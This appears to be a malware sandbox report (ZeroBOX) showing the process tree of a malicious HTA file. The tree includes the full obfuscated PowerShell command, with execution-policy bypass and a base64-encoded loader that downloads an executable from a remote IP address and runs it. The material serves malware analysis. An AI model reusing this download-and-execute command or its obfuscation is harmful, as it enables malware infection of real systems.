| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\newupdate.hta.html
3060
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3060 CREDAT:145409
  2228
  - cmd.exe "C:\Windows\system32\cmd.exe" "/c PowersHeLL.eXE -eX byPAss -nOp -W 1 -C DeVICecRedentIAlDePLoYMENT ; IeX($(iEX('[sYStEM.teXt.enCoDING]'+[CHar]58+[cHar]0X3A+'uTF8.gEtStrINg([syStEM.COnvErT]'+[char]58+[CHaR]0X3a+'fROMbaSE64sTRIng('+[ChAr]34+'JG5MS1R2TSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iZXJERUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEh6YlQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKUyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5tZXZMYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiQWdCakNLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWld3c1ZrSFVjKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqS1JMUmhFRHNPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG5MS1R2TTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC4xMi44MS4yNTIvMjIwL3Nob3N0LmV4ZSIsIiRlTlY6QVBQREFUQVxzaG9zdC5leGUiLDAsMCk7U1RhclQtc0xlRXAoMyk7c1RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2hvc3QuZXhlIg=='+[Char]0X22+'))')))"
    1692
    - powershell.exe PowersHeLL.eXE -eX byPAss -nOp -W 1 -C DeVICecRedentIAlDePLoYMENT ; IeX($(iEX('[sYStEM.teXt.enCoDING]'+[CHar]58+[cHar]0X3A+'uTF8.gEtStrINg([syStEM.COnvErT]'+[char]58+[CHaR]0X3a+'fROMbaSE64sTRIng('+[ChAr]34+'JG5MS1R2TSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iZXJERUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEh6YlQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKUyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5tZXZMYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiQWdCakNLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWld3c1ZrSFVjKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqS1JMUmhFRHNPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG5MS1R2TTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC4xMi44MS4yNTIvMjIwL3Nob3N0LmV4ZSIsIiRlTlY6QVBQREFUQVxzaG9zdC5leGUiLDAsMCk7U1RhclQtc0xlRXAoMyk7c1RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2hvc3QuZXhlIg=='+[Char]0X22+'))')))"
      1560
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\_iswctby.cmdline"
        2284
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES40B9.tmp" "c:\Users\test22\AppData\Local\Temp\CSC405A.tmp"
        2996

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents